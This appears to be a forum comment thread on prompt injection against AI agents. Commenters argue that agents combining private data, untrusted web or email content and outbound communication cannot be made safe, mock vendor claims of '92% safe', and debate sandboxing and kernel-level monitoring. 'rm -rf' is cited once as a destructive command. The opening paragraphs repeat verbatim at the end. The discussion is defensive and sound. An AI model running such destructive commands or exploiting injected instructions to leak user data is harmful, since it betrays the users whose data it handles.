It's very simple: prompt injection is a completely unsolved problem. As things currently stand, the only fix is to avoid the lethal trifecta.
Unfortunately, people really, really want to do things involving the lethal trifecta. They want to be able to give a bot control over a computer with the ability to read and send emails on their behalf. They want it to be able to browse the web for research while helping you write proprietary code. But you can't safely do that. So if you're a massively overvalued AI company, what do you do?
You could say, sorry, I know you want to do these things but it's super dangerous, so don't. You could say, we'll give you these tools but be aware that it's likely to steal all your data. But neither of those are attractive options. So instead they just sort of pretend it's not a big deal. Prompt injection? That's OK, we train our models to be resistant to them. 92% safe, that sounds like a good number as long as you don't think about what it means, right! Please give us your money now.
For a specific bad thing like "rm -rf" that may be plausible, but this will break down when you try to enumerate all the other bad things it could possibly do.
We can, but if you want to stop private info from being leaked then your only sure choice is to stop the agent from communicating with the outside world entirely, or not give it any private info to begin with.
And? If your LLM is controlling user-mode software, you can still easily capture and audit everything from the kernel's perspective. Sandboxing, event tracing, etc...
No need to "ask" for "proof". You can monitor the system in real-time and detect malicious or potentially harmful activity and stop it early. The same tools and methodologies used by security tools for decades...
Unfortunately, people really, really want to do things involving the lethal trifecta. They want to be able to give a bot control over a computer with the ability to read and send emails on their behalf. They want it to be able to browse the web for research while helping you write proprietary code. But you can't safely do that. So if you're a massively overvalued AI company, what do you do?
You could say, sorry, I know you want to do these things but it's super dangerous, so don't. You could say, we'll give you these tools but be aware that it's likely to steal all your data. But neither of those are attractive options. So instead they just sort of pretend it's not a big deal. Prompt injection? That's OK, we train our models to be resistant to them. 92% safe, that sounds like a good number as long as you don't think about what it means, right! Please give us your money now.